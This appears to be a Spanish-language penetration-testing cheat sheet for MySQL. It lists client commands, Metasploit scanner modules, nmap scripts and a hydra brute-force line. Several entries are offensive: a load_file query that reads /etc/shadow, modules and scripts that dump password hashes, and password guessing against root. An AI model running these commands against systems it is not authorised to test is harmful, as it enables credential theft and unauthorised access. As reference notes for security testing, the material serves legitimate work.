MySQL

Comandos básicos

Acceso sin contraseña como <usuario> : mysql -h -u <usuario>

Acceso con contraseña como <usuario> : mysql -h -u <usuario> -p

Enumeración de BDs : show databases;

Usar BD : use <BD>;

Mostrar tablas : show tables;

Consultas : select * from <table>;

Visualizar archivo local del equipo : select load_file(”/etc/shadow”);

A continuación se presentan algunos de los módulos que podemos usar en metasploit

auxiliary/scanner/mysql/mysql_writable_dirs

auxiliary/scanner/mysql/mysql_hashdump

auxiliary/scanner/mysql/mysql_version

auxiliary/scanner/mysql/mysql_file_enum

auxiliary/scanner/mysql/mysql_hashdump

auxiliary/scanner/mysql/mysql_writable_dirs

auxiliary/admin/mysql/mysql_sql

nmap <IP> -sV -p 3306 —script=mysql-empty-password

nmap <IP> -sV -p 3306 —script=mysql-info

nmap <IP> -sV -p 3306 —script=mysql-users —script-args=”mysqluser=’root’,mysqlpass=’’”

nmap <IP> -sV -p 3306 —script=mysql-dump-hashes —script-args=”username=’root’,password=’’”

nmap <IP> -sV -p 3306 —script=mysql-databases —script-args=”mysqluser=’root’,mysqlpass=’’”

hydra -l root -P <diccionario> mysql://<IP>

Última actualización hace 1 año